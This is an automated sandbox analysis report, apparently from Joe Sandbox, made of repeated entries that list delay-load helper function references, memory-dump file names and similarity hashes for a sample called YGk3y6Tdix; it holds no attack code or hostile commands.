                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 4447a4643b111184797a0cae444f511a63f994c58363a52c60152764b7a9ea74
                                                                                                                                                                                              • Instruction ID: 7adfccb5672fc635a8aa54ffc3cba7a53ba330542ea155a2b0cb7ffe790aa139
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4447a4643b111184797a0cae444f511a63f994c58363a52c60152764b7a9ea74
                                                                                                                                                                                              • Instruction Fuzzy Hash: D0B012E2359001BC3005510B6D02EF7015ED1C5F10334C02FFC05C41C0D840EC003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: e289a0a0df51f71db15bf012f1dc813775971be11b4cc4aceda98aabed946de5
                                                                                                                                                                                              • Instruction ID: bd647303ce758307e05875f8bcc9a843da46a49bc342e90a6aeda0eb0a7e91eb
                                                                                                                                                                                              • Opcode Fuzzy Hash: e289a0a0df51f71db15bf012f1dc813775971be11b4cc4aceda98aabed946de5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87B012D2358401EC3005520B6E02EF7015ED1C4B10334C02FF805C42C0DC51EC493C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 7ee412eba10d878820ab9e3917ba6451af74365e6782489ba0d724e4131b67b9
                                                                                                                                                                                              • Instruction ID: 88a353cafeddceaa7962abd9ff68a16e09f82d4bb6b4605551ab706975a2bdae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ee412eba10d878820ab9e3917ba6451af74365e6782489ba0d724e4131b67b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2B012D2358541FC3045520B6D02EF7015ED1C4B10334C12FF805C42C0D840EC443C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 3da63a467c8ec769823efd434e310e50925377592473667a5f8d36a5323db929
                                                                                                                                                                                              • Instruction ID: 70d68e98962341d51e2dc4ae98a31f4b77240ff6402006d64ddc878f6be83fea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3da63a467c8ec769823efd434e310e50925377592473667a5f8d36a5323db929
                                                                                                                                                                                              • Instruction Fuzzy Hash: E8B012E2259501BC3045D2065C02DF7028ED0C0B10334C01FF808C51C0D840CC043CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 0184ce535400e695c682bbc55a13bc86065fd70e4ade5f451fd2d78e346c992c
                                                                                                                                                                                              • Instruction ID: d1e439ca5079ea15ac26034a25657ef5b9be9efcd7c21d63abc1de5eab001aeb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0184ce535400e695c682bbc55a13bc86065fd70e4ade5f451fd2d78e346c992c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04B012F225A001BC3045D2065C02DF7028ED0C0F10334801FF808C51C0D844CD003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: ec8eae6cbfe09791d7afdb1dbfefc8775a088a6fd1f9195cc6814134f36a246f
                                                                                                                                                                                              • Instruction ID: aa391e508001ad5923c3376a4f3d90856d4316cbb856b06782be33af1b5fc32b
                                                                                                                                                                                              • Opcode Fuzzy Hash: ec8eae6cbfe09791d7afdb1dbfefc8775a088a6fd1f9195cc6814134f36a246f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52B012E22594017C304592075D02DF7028ED0C0B10334C01FF508C51C0D840CC493CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE580
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: aa7753dd1d1073dbf689401d42fcd72c57bc1f320db7d692cc3cb73c39904af4
                                                                                                                                                                                              • Instruction ID: e9a8b152b6fa24d801436a5a7e789bf5a179124fe440b4e766c127764d4393d1
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa7753dd1d1073dbf689401d42fcd72c57bc1f320db7d692cc3cb73c39904af4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27B012C225C1017C304652569C07DF7017ED4C4B10338421FF408C51C0E840CC503C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE580
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 73f787c376f3c9800c76bac0821ff40d2d6b5bf826103ed4a3a2e7d005a91829
                                                                                                                                                                                              • Instruction ID: 1c22a0351ca227db30221011a23220da44c3557501d12fba56121f96c191ac37
                                                                                                                                                                                              • Opcode Fuzzy Hash: 73f787c376f3c9800c76bac0821ff40d2d6b5bf826103ed4a3a2e7d005a91829
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1B012C225C0017C300652579D02DF7017ED4C4B10338421FF408C51C0EC40CC113C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE580
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 8050ba48777c44ab3c2dd00d6c5d4d141c3f8b039eb452529d0cea60fc8d544d
                                                                                                                                                                                              • Instruction ID: f9790d4c2904a1685c103b61d5cf4d2f814716195962468f4e7515d719bb4f61
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8050ba48777c44ab3c2dd00d6c5d4d141c3f8b039eb452529d0cea60fc8d544d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB012C22580017D300653565C02DF7015EE5C8B10334401FF408C51C0EC40CC143C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 2591fa4d5b1f87dfcacb563ce91907432963616a28cb151bc0d640fd398ecb6d
                                                                                                                                                                                              • Instruction ID: 76bca5c3aa1749ea65e1f1bcd18ac6d58a5848bc5e46070814b75fea17bc456d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2591fa4d5b1f87dfcacb563ce91907432963616a28cb151bc0d640fd398ecb6d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DB012C269D5017C3105A10A9C07DFB014ED0C1F10334831FF448C41C0E840DC443C73
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 096a8c5f6b736cfc0e65cc11c2dbe929405047aadfda899ce1ab1a41846c4945
                                                                                                                                                                                              • Instruction ID: adc060a746427087c1b373636ed8df72e17feaa9ad73dc1009c73760d43f0e95
                                                                                                                                                                                              • Opcode Fuzzy Hash: 096a8c5f6b736cfc0e65cc11c2dbe929405047aadfda899ce1ab1a41846c4945
                                                                                                                                                                                              • Instruction Fuzzy Hash: CBB012C22994017D3005A20A5C02EFB014EE0C1F10334411FF488C41C0EC40CC043C73
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: ff3d39c8d685ebc09bfa84545ecdf8bdd5d83654e217a00802744e5e276d797c
                                                                                                                                                                                              • Instruction ID: 7719ad55a407ccf4815f0e59b965affe50224a84a25a007668a420a9aa58097f
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff3d39c8d685ebc09bfa84545ecdf8bdd5d83654e217a00802744e5e276d797c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FB012C22994427C3005A20B5D02DFB054ED0C1F10334811FF588C41C0EC40CC013C73
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 4976ed848000d895b798436902049bdd7e4917b13196eae9b344867fd00068af
                                                                                                                                                                                              • Instruction ID: 287446bc226e1269baf5e45ae2e94f9d7e4f62489cb64d3e0b37a6314bed393f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4976ed848000d895b798436902049bdd7e4917b13196eae9b344867fd00068af
                                                                                                                                                                                              • Instruction Fuzzy Hash: 48B012C22994017C300561265C06EFB010EE0C1F10734412FF494C44C2E840CC043C73
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
